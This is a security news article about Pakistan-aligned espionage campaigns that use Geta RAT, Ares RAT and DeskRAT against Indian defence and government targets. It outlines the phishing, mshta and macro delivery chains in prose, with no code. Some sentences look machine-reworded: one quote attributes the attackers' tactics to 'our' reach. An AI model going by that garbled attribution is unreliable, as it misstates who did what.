India’s defense sector and government-linked organizations have been targeted by multiple campaigns aimed at compromising Windows and Linux environments using remote access Trojans that can steal sensitive data and ensure continued access to infected machines.
This campaign is characterized by the use of malware families such as Geta RAT, Ares RAT, and DeskRAT, and is often attributed to Pakistan-aligned threat clusters tracked as SideCopy and APT36 (also known as Transparent Tribe). SideCopy has been around since at least 2019 and is believed to operate as a division of the Transparent Tribe.
“Taken together, these campaigns reinforce a familiar but evolving narrative,” said Aditya K. Sood, vice president of security engineering and AI strategy at Aryaka. “Transparent Tribe and SideCopy aren’t reinventing espionage; they’re refining it.”
“By expanding our cross-platform reach, leveraging memory-resident technologies, and experimenting with new delivery vectors, this ecosystem continues to operate below the noise floor while maintaining its strategic focus.”
What all campaigns have in common is the use of phishing emails containing malicious attachments or embedded download links to lure potential targets to attacker-controlled infrastructure. These initial access mechanisms act as a conduit to open Windows shortcuts (LNKs), ELF binaries, and PowerPoint add-in files, which, when opened, launch a multi-step process to drop the Trojan.
This malware family is designed to provide persistent remote access, enable system reconnaissance, collect data, execute commands, and facilitate long-term post-compromise operations in both Windows and Linux environments.
One of the attack chains is as follows: The malicious LNK file calls ‘mshta.exe’ to run an HTML application (HTA) file hosted on the compromised legitimate domain. The HTA payload includes JavaScript to decrypt the embedded DLL payload. This processes the embedded data blob, writes a decoy PDF to disk, connects to a hardcoded command and control (C2) server, and displays the saved decoy file.
After displaying the decoy document, the malware checks installed security products and adapts its persistence method accordingly before deploying Geta RAT on infected hosts. It is worth noting that this attack chain was detailed by CYFIRMA and Seqrite Labs researcher Sathwik Ram Prakki in late December 2025.
Geta RAT supports a variety of commands to collect system information, enumerate running processes, terminate specified processes, list installed apps, collect credentials, retrieve and replace the contents of the clipboard with attacker-supplied data, capture screenshots, perform file operations, execute arbitrary shell commands, and collect data from attached USB devices.
Running alongside this Windows-focused campaign is a Linux variant that uses Go binaries as a starting point to drop the Python-based Ares RAT via shell scripts downloaded from external servers. Similar to Geta RAT, Ares RAT can execute a wide range of commands to collect sensitive data, as well as execute Python scripts and commands issued by threat actors.
Aryaka said he also observed another campaign in which the Golang malware DeskRAT was delivered via a malicious PowerPoint add-in file. This add-in file runs an embedded macro to establish outbound communication with the remote server and retrieve the malware. APT36’s use of DeskRAT was documented by Sekoia and QiAnXin XLab in October 2025.
“These campaigns demonstrate well-resourced espionage-focused threat actors intentionally targeting India’s defense, government, and strategic sectors through defense-themed decoys, official document spoofing, and regionally trusted infrastructure,” the company said. “This work extends beyond defense to policy, research, critical infrastructure, and defense-adjacent organizations operating within the same trusted ecosystem.”
“The deployment of Desk RAT, alongside Geta RAT and Ares RAT, highlights an evolving toolkit optimized for stealth, persistence, and long-term access.”
Source link
